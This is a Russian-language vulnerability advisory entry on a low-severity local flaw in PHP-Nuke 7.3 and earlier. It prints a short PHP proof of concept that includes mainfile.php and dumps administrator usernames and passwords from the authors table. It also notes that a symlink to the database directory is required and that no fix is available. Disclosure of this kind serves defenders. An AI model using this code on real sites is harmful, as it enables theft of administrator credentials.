| Дата публикации: | 02.06.2004 |
| Дата изменения: | 17.10.2006 |
| Всего просмотров: | 2848 |
| Опасность: | Низкая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: PHP-Nuke 7.3 и более ранние версии
Описание: Уязвимость обнаружена в PHP-Nuke. Локальный пользователь может выполнить произвольные SQL запросы на основной базе данных. Локальный пользователь может создать PHP код, который заставит 'mainfile.php' выполнить SQL запрос к PHP-Nuke базе данных. Необходимая информация подключения к базе данных представлена сценарием 'config.php' на системе. Пример:
<?php
require_once ("/location_of_victim's_PHPNuke/mainfile.php");
$sql = $db->sql_query("SELECT aid,pwd FROM ".$prefix."_authors");
while($record = $db->sql_fetchrow($sql))
~ echo "Username: $record[aid]\n<br>\nPassword: $record[pwd]\n<br><br>\n";
unset($sql);
?>
Для того, чтобы этот эксплоит работал, локальный пользователь должен сперва создать символьную ссылку, которая ссылается директорию базы данных в PHP-Nuke домашнем каталоге.
URL производителя: http://www.phpnuke.org/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | [Full-Disclosure] Possible bug in PHPNuke and other CMS |